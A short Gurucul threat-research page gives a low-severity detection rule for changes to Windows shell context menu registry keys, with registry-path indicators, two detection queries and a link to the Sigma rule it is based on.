Shell Context Menu Command Tampering

    Wednesday, January 8, 2025 In: Threat Research Print

    Date: 01/08/2025

    Severity: Low

    Summary

    Identifies modifications to shell context menu commands. This rule can help uncover potential anomalies or suspicious shell commands.

    Indicators of Compromise (IOC) List

    TargetObject : 

    - '\Software\Classes\'

    - '\shell\'

    - '\command\'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query : 

    resourcename = "Windows Security" and eventtype = "4657" and (objectname like "\Software\Classes" and objectname like "\shell" and objectname like "\command")

    Detection Query :

    technologygroup = "EDR"  and (objectname like "\Software\Classes" and objectname like "\shell" and objectname like "\command")

    Reference:   

    https://github.com/SigmaHQ/sigma/blob/master/rules-threat-hunting/windows/registry/registry_set/registry_set_shell_context_menu_tampering.yml 


    Tags

    MalwareSigma

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.